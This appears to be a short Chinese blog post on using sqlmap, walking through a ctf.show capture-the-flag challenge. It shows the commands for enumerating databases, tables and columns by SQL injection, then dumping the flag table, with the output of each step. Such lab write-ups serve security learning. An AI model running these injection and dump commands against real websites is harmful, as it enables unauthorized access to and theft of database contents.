huarui bio photo

sqlmap使用


  • 常用参数
常用参数
--dbs 所有数据库
--tables 所有表
--columns 所有列


第一步:开始脚本注入


  • 使用sqlmap -u url来进行注入

例:

sqlmap -u “http://d96b8b94-0e30-4e6a-810b-caf654fe2b02.challenge.ctf.show/?id=”


第二步:查表

执行上述命令后得到注入成功的回显然后可以进行查库操作


如上述命令执行后得到


available databases [7]:                                                                                                                                                                                    
[*] ctfshow
[*] ctftraining
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test


  • 接下来可以查看指定库的所有表:sqlmap -u “http://d96b8b94-0e30-4e6a-810b-caf654fe2b02.challenge.ctf.show/?id=” -D ctfshow –tables

  • 得到回显

Database: ctfshow
[1 table]
+------+
| flag |
+------+
  • 到这里就说明查询到表flag了,接下来使用: sqlmap -u “http://d96b8b94-0e30-4e6a-810b-caf654fe2b02.challenge.ctf.show/?id=” -D ctfshow -T flag –columns

Database: ctfshow                                                                                                                                                                                           
Table: flag
[2 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| flag   | varchar(255) |
| id     | int(11)      |
+--------+--------------+
  • 接下来使用直接dump出来: sqlmap -u “http://d96b8b94-0e30-4e6a-810b-caf654fe2b02.challenge.ctf.show/?id=” -D ctfshow -T flag –dump
Database: ctfshow
Table: flag
[1 entry]
+----+-----------------------------------------------+
| id | flag                                          |
+----+-----------------------------------------------+
| 1  | ctfshow{cd6650cb-4523-49ee-8251-bcbf145e920c} |
+----+-----------------------------------------------+